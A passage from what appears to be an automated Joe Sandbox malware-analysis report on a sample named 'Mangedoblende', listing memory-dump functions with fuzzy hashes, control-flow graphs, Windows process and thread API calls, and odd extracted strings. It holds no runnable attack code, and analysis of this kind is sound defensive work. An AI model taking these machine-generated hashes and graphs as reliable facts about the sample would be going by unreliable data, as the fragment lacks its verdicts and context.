                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7399bbd5a2f57174129faac221e9dadad7aab59db599c0bf7a61c8b598d39224
                                                                                                                                                                            • Instruction ID: f7d0deb6a330caeb4cc9659127f2f15fd68c904fdf2a9c21b7af38c8e79bc55f
                                                                                                                                                                            • Opcode Fuzzy Hash: 7399bbd5a2f57174129faac221e9dadad7aab59db599c0bf7a61c8b598d39224
                                                                                                                                                                            • Instruction Fuzzy Hash: 02D18D78E05318CFDB15DFA5C984B9DBBB2BF89300F2081A9D408AB265DB349E81DF50
                                                                                                                                                                            Function 227A8FB0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 23a321f2f9cf19bb187fc3817fa95098253e441f632365ab2b96912b95feeb7f
                                                                                                                                                                            • Instruction ID: aaf96e43254fd679e1c654a10cacc9953a7016f6193f4dfd1ab0f82ad5d9e702
                                                                                                                                                                            • Opcode Fuzzy Hash: 23a321f2f9cf19bb187fc3817fa95098253e441f632365ab2b96912b95feeb7f
                                                                                                                                                                            • Instruction Fuzzy Hash: D8D1AE78E00618CFDB55DFA5C994B9DBBB2BF89300F5081A9D908AB365DB359E81CF10
                                                                                                                                                                            Function 227AB7A8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8a08abc2f7220252e55b038c2138ed77d9bf0dd92c8f5aad28be09292aceb273
                                                                                                                                                                            • Instruction ID: 5ca638a4e682310abb99e1a0e4b193589682bc4790ed0e4271823622950ab59b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a08abc2f7220252e55b038c2138ed77d9bf0dd92c8f5aad28be09292aceb273
                                                                                                                                                                            • Instruction Fuzzy Hash: 50D1AE78E04318CFDB15DFA5C994B9DBBB2AF89300F5081A9D908AB369DB359D81CF50
                                                                                                                                                                            Function 227A7720 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350893219.00000000227A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 227A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_227a0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b49d86350235eb21d5d90a1063f4ff1eae264dfda0a26d3ae0daf84626133b18
                                                                                                                                                                            • Instruction ID: acdd13c0c5996f6e453e2dd89a7f46f2d1d2bb41212acf7f7f7fcdd4c767cc55
                                                                                                                                                                            • Opcode Fuzzy Hash: b49d86350235eb21d5d90a1063f4ff1eae264dfda0a26d3ae0daf84626133b18
                                                                                                                                                                            • Instruction Fuzzy Hash: F3C1C074E05218CFDB14DFA5C994B9DBBB2BF89305F2081AAD408AB365DB359E81CF50
                                                                                                                                                                            Function 225BE258 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 78ae1bed1f24ff08c309da5afd18a7e32c0a17e08991bb6bec2675e7f30529e5
                                                                                                                                                                            • Instruction ID: 5c3d02df1a8edaecd048af6cd97bc2315e669f4848f6cb001f063539cf63199f
                                                                                                                                                                            • Opcode Fuzzy Hash: 78ae1bed1f24ff08c309da5afd18a7e32c0a17e08991bb6bec2675e7f30529e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 3DC1AF74E04218CFDB14DFA5C984B9DBBB2AF89305F6081A9D409AB369DB359E85CF10
                                                                                                                                                                            Function 225BEB08 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5b53a2220baeb2b366b7571b1fec63f40d8521aa3ded79e138807da44547e9f3
                                                                                                                                                                            • Instruction ID: f4c60e2443c1e9ebd2ad7510046828d33374f4dba518a9b28a05aa1957c93a8e
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b53a2220baeb2b366b7571b1fec63f40d8521aa3ded79e138807da44547e9f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4EC1A074E04218CFDB14DFA5C984B9DBBB2BF89305F6081A9D409AB369DB359E81CF50
                                                                                                                                                                            Function 225B2970 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 345aa79df168c93eeb1ed2a8d9582886593565b640f2d5602e8b7bd38086decd
                                                                                                                                                                            • Instruction ID: 033866524df9e765f931c9e665e535cb644c8851a4bf74fdceb88603d3aaeec1
                                                                                                                                                                            • Opcode Fuzzy Hash: 345aa79df168c93eeb1ed2a8d9582886593565b640f2d5602e8b7bd38086decd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CC19E74E04218CFDB14DFA5C984B9DBBB2BF89305F1081AAD809A7369DB759E81CF11
                                                                                                                                                                            Function 225B2DD0 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e0a31e7d6b4eff9d1e9c18753acc5652908de42c07510bd15afca67937a09f2
                                                                                                                                                                            • Instruction ID: e86e7c673957263d13d8359cf9166a0ba6d22de1562659d99797ed7b570ee0d4
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e0a31e7d6b4eff9d1e9c18753acc5652908de42c07510bd15afca67937a09f2
                                                                                                                                                                            • Instruction Fuzzy Hash: F7A10570D00208CFDB14DFA9C984BDDBBB1FF88314F209269E509AB2A5DBB49985CF51
                                                                                                                                                                            Function 225B3116 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d0b2534b604526a673741aa48f158330e437a2482e0e20675aa94d825d310a2e
                                                                                                                                                                            • Instruction ID: 0b5296f83f5b1a46efb20ce8e02fad636aaaf6f8fafed75719df9667bc2e47b8
                                                                                                                                                                            • Opcode Fuzzy Hash: d0b2534b604526a673741aa48f158330e437a2482e0e20675aa94d825d310a2e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4091F270D00218CFDB10DFA8C984B9DBBB1FF49314F209669E509BB2A5DBB49985CF11
                                                                                                                                                                            Function 228370C0 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e08008276e1ec631960e801d9f1459392c3e897f7a89a34d41c630240965091
                                                                                                                                                                            • Instruction ID: ba43e15b6409e278923312d466c0d3e1919c33c12e9d8ac8a7c23c4912549b30
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e08008276e1ec631960e801d9f1459392c3e897f7a89a34d41c630240965091
                                                                                                                                                                            • Instruction Fuzzy Hash: DB81C474E00618CFDB05DFA9C980ADDBBB2FF88300F608169D404AB369DB399946DF50
                                                                                                                                                                            Function 2284FB30 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a92fe7128cf0c859b5b9ecc4b13c4fadd8071a856afed111f5e2352399210dcd
                                                                                                                                                                            • Instruction ID: 5340c7ac91ce8ec84ec022e84f6ca19dd2f602d1c7f64daa9eb33d942b4de14d
                                                                                                                                                                            • Opcode Fuzzy Hash: a92fe7128cf0c859b5b9ecc4b13c4fadd8071a856afed111f5e2352399210dcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 4081C578E00618CFDB05DFA9C980B9DBBB2FF88300F608169D404AB369DB359941DF54
                                                                                                                                                                            Function 22848470 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1803015eb90b51fb66d64725acd8d88a693eaa5bc1f7d529c4db14f870b0180
                                                                                                                                                                            • Instruction ID: ba731865d6ac270e1f94ef51be07bf2885966817eb2fd90e6571af504abe0b6e
                                                                                                                                                                            • Opcode Fuzzy Hash: f1803015eb90b51fb66d64725acd8d88a693eaa5bc1f7d529c4db14f870b0180
                                                                                                                                                                            • Instruction Fuzzy Hash: 1781D578E00618CFDB05DFA9C990BADBBB2FF88300F608169D404AB369DB359942DF54
                                                                                                                                                                            Function 0018E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 16b8ac38db09cfd65d37b821f2785307e26ee55d2e3f0c5d6874a2c35a8c3f7f
                                                                                                                                                                            • Instruction ID: 13cb740b8e25f4f5cc5df8ae0d3572363d09d20b8dce031d052b8898add411fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 16b8ac38db09cfd65d37b821f2785307e26ee55d2e3f0c5d6874a2c35a8c3f7f
                                                                                                                                                                            • Instruction Fuzzy Hash: D1519474E04608DFDB19DFAAD984A9DBBF2FF89300F248029E815AB365DB349941CF14
                                                                                                                                                                            Function 0018E983 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7057c4a6ccbc3e608d4d70458f200c7039d4ec0989e90e628375aa56ecc3a0c3
                                                                                                                                                                            • Instruction ID: 652e7ebf88c4b9d284dcdd8ad75e71ce128038adf8de884604564ece47baf42c
                                                                                                                                                                            • Opcode Fuzzy Hash: 7057c4a6ccbc3e608d4d70458f200c7039d4ec0989e90e628375aa56ecc3a0c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 7751A274E04608DFDB19DFAAD984A9DBBF2FF89300F248029E815AB365DB349941CF14
                                                                                                                                                                            Function 22816568 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3c6fc9bb56f2c210452d7f3b093329b9eb418de269834429d20358521447b9b9
                                                                                                                                                                            • Instruction ID: c1e0bdbfdfb815b1224c553c6b3172c63389fb834f459d6099720f7fbede8534
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6fc9bb56f2c210452d7f3b093329b9eb418de269834429d20358521447b9b9
                                                                                                                                                                            • Instruction Fuzzy Hash: B64122B4D04368CFDB18CFAAD9546DDBBB2AF89300F10C06AC458AB2A5DB349946CF50
                                                                                                                                                                            Function 22815FC7 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 28e08b859c88d394501291193e554cd549a88992d1723befd4f20b70e97a6f87
                                                                                                                                                                            • Instruction ID: 4e2257fc9aec6930994ef0f30ceb0d1c32b483fececf8af1be8d069216cdd4c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 28e08b859c88d394501291193e554cd549a88992d1723befd4f20b70e97a6f87
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D51D2B1D00618CBEB18DFAAC9447DDBBF2AF89304F14C16AC418BB2A5DB754986CF10
                                                                                                                                                                            Function 2281CAD1 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fdddd97250040de82560c05c2ab4876b690f8da2d971b4280d208e9e801ab5dc
                                                                                                                                                                            • Instruction ID: 3dff3c6ac599d753a9832fc8d6b2ff3c4710f6e236c6c35e1ae1473d98f7bd74
                                                                                                                                                                            • Opcode Fuzzy Hash: fdddd97250040de82560c05c2ab4876b690f8da2d971b4280d208e9e801ab5dc
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C41D174E002188BDB08CFAAD9547DEBBF2AF89300F10D16AD518BB264EB749946CF54
                                                                                                                                                                            Function 22841CE0 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8f9f8c3b500b5fa60622e59c0cc433ba72f4c2796054a3e56f1fd4902ebb2d51
                                                                                                                                                                            • Instruction ID: 4bb1f6a2b71a75ee8efee42a2e45b21d54238d0655c5be0ffbf624fb793aa42c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f9f8c3b500b5fa60622e59c0cc433ba72f4c2796054a3e56f1fd4902ebb2d51
                                                                                                                                                                            • Instruction Fuzzy Hash: EB41E2B4E04618CBDB08CFAAD9446DDBBF2BF89300F10C06AC418BB264EB745946CF54
                                                                                                                                                                            Function 2281660F Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: aece4a25dffa57146d7dc93c11163664ba9428ab59ebcc897f766272ed70baf2
                                                                                                                                                                            • Instruction ID: 1a8cd66ab22a4bf51d9dbf54e3f5b74c378789bf04d73b27d94ddf1324681fef
                                                                                                                                                                            • Opcode Fuzzy Hash: aece4a25dffa57146d7dc93c11163664ba9428ab59ebcc897f766272ed70baf2
                                                                                                                                                                            • Instruction Fuzzy Hash: 2341E5B4D00618CBDB18CFAAD9546DDBBF2BF89300F10C169D458BB2A4DB749945CF50
                                                                                                                                                                            Function 001876F8 Relevance: 10.4, Strings: 8, Instructions: 446COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 526 1876f8-187725 527 18772b-18774e 526->527 528 187b54-187b58 526->528 537 1877fc-187800 527->537 538 187754-187761 527->538 529 187b5a-187b6e 528->529 530 187b71-187b7f 528->530 535 187bf0-187c05 530->535 536 187b81-187b96 530->536 544 187c0c-187c19 535->544 545 187c07-187c0a 535->545 546 187b98-187b9b 536->546 547 187b9d-187baa 536->547 541 187848-187851 537->541 542 187802-187810 537->542 550 187770 538->550 551 187763-18776e 538->551 548 187c67 541->548 549 187857-187861 541->549 542->541 562 187812-18782d 542->562 552 187c1b-187c56 544->552 545->552 553 187bac-187bed 546->553 547->553 556 187c6c-187c7a 548->556 549->528 554 187867-187870 549->554 557 187772-187774 550->557 551->557 597 187c5d-187c64 552->597 560 18787f-18788b 554->560 561 187872-187877 554->561 557->537 565 18777a-1877dc 557->565 560->556 563 187891-187897 560->563 561->560 582 18783b 562->582 583 18782f-187839 562->583 568 18789d-1878ad 563->568 569 187b3e-187b42 563->569 609 1877de 565->609 610 1877e2-1877f9 565->610 580 1878af-1878bf 568->580 581 1878c1-1878c3 568->581 569->548 572 187b48-187b4e 569->572 572->528 572->554 585 1878c6-1878cc 580->585 581->585 586 18783d-18783f 582->586 583->586 585->569 592 1878d2-1878e1 585->592 586->541 593 187841 586->593 594 18798f-1879ba call 187538 * 2 592->594 595 1878e7 592->595 593->541 614 1879c0-1879c4 594->614 615 187aa4-187abe 594->615 599 1878ea-1878fb 595->599 599->556 601 187901-187913 599->601 601->556 604 187919-187931 601->604 666 187933 call 1880d8 604->666 667 187933 call 1880d3 604->667 607 187939-187949 607->569 608 18794f-187952 607->608 612 18795c-18795f 608->612 613 187954-18795a 608->613 609->610 610->537 612->548 617 187965-187968 612->617 613->612 613->617 614->569 616 1879ca-1879ce 614->616 615->528 633 187ac4-187ac8 615->633 620 1879d0-1879dd 616->620 621 1879f6-1879fc 616->621 622 18796a-18796e 617->622 623 187970-187973 617->623 636 1879ec 620->636 637 1879df-1879ea 620->637 625 1879fe-187a02 621->625 626 187a37-187a3d 621->626 622->623 624 187979-18797d 622->624 623->548 623->624 624->548 631 187983-187989 624->631 625->626 632 187a04-187a0d 625->632 628 187a49-187a4f 626->628 629 187a3f-187a43 626->629 634 187a5b-187a5d 628->634 635 187a51-187a55 628->635 629->597 629->628 631->594 631->599 638 187a1c-187a32 632->638 639 187a0f-187a14 632->639 640 187aca-187ad4 call 1863e0 633->640 641 187b04-187b08 633->641 642 187a5f-187a68 634->642 643 187a92-187a94 634->643 635->569 635->634 644 1879ee-1879f0 636->644 637->644 638->569 639->638 640->641 654 187ad6-187aeb 640->654 641->597 646 187b0e-187b12 641->646 649 187a6a-187a6f 642->649 650 187a77-187a8d 642->650 643->569 651 187a9a-187aa1 643->651 644->569 644->621 646->597 652 187b18-187b25 646->652 649->650 650->569 657 187b34 652->657 658 187b27-187b32 652->658 654->641 663 187aed-187b02 654->663 660 187b36-187b38 657->660 658->660 660->569 660->597 663->528 663->641 666->607 667->607
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq$(oeq$(oeq$(oeq$(oeq$(oeq$,iq$,iq
                                                                                                                                                                            • API String ID: 0-4181857939
                                                                                                                                                                            • Opcode ID: 3fc2afa1db451af6f4ecf860ce32d6ed45a7645ec91d60145c0b281790da9021
                                                                                                                                                                            • Instruction ID: 4c7eee4a98c670966862f0f44dd2b3e0ca573a81d0aaa6cf93d1197fa5a1cb1d
                                                                                                                                                                            • Opcode Fuzzy Hash: 3fc2afa1db451af6f4ecf860ce32d6ed45a7645ec91d60145c0b281790da9021
                                                                                                                                                                            • Instruction Fuzzy Hash: B4124C30A046099FCB15EF69D984AAEBBF2FF89314F248559E815DB2A1D730EE41CF50
                                                                                                                                                                            Function 229CBFDA Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1785 229cbfda-229cc077 GetCurrentProcess 1789 229cc079-229cc07f 1785->1789 1790 229cc080-229cc0b4 GetCurrentThread 1785->1790 1789->1790 1791 229cc0bd-229cc0f1 GetCurrentProcess 1790->1791 1792 229cc0b6-229cc0bc 1790->1792 1794 229cc0fa-229cc115 call 229cc1ba 1791->1794 1795 229cc0f3-229cc0f9 1791->1795 1792->1791 1798 229cc11b-229cc14a GetCurrentThreadId 1794->1798 1795->1794 1799 229cc14c-229cc152 1798->1799 1800 229cc153-229cc1b5 1798->1800 1799->1800
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 229CC066
                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 229CC0A3
                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 229CC0E0
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 229CC139
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                            • Opcode ID: 1826d8c1331561b7acb73b3e443021416f5a7217362999545770b3a8a271b807
                                                                                                                                                                            • Instruction ID: 6df0808d559f5afbfb2d305898c943c56fde481e9736b373d90d045c1e405e28
                                                                                                                                                                            • Opcode Fuzzy Hash: 1826d8c1331561b7acb73b3e443021416f5a7217362999545770b3a8a271b807
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C5147B0900749CFDB14CFA9CA487AEBFF1EF88314F208599E449A72A1D7749944CF66
                                                                                                                                                                            Function 229CBFE8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1807 229cbfe8-229cc077 GetCurrentProcess 1811 229cc079-229cc07f 1807->1811 1812 229cc080-229cc0b4 GetCurrentThread 1807->1812 1811->1812 1813 229cc0bd-229cc0f1 GetCurrentProcess 1812->1813 1814 229cc0b6-229cc0bc 1812->1814 1816 229cc0fa-229cc115 call 229cc1ba 1813->1816 1817 229cc0f3-229cc0f9 1813->1817 1814->1813 1820 229cc11b-229cc14a GetCurrentThreadId 1816->1820 1817->1816 1821 229cc14c-229cc152 1820->1821 1822 229cc153-229cc1b5 1820->1822 1821->1822
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 229CC066
                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 229CC0A3
                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 229CC0E0
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 229CC139
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                            • Opcode ID: 7333cf59c66a34136ba2336b5bec3754593bfbec5cc1e95f96aa478a46ea26e4
                                                                                                                                                                            • Instruction ID: 4d746e3f20971c257a3bcb3401051468ebaab61d970fd587ee32ef7b33166061
                                                                                                                                                                            • Opcode Fuzzy Hash: 7333cf59c66a34136ba2336b5bec3754593bfbec5cc1e95f96aa478a46ea26e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 765148B0900749CFDB14CFA9CA88BAEBFF5EF88314F208559E409A7260D7749944CF66
                                                                                                                                                                            Function 00185F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
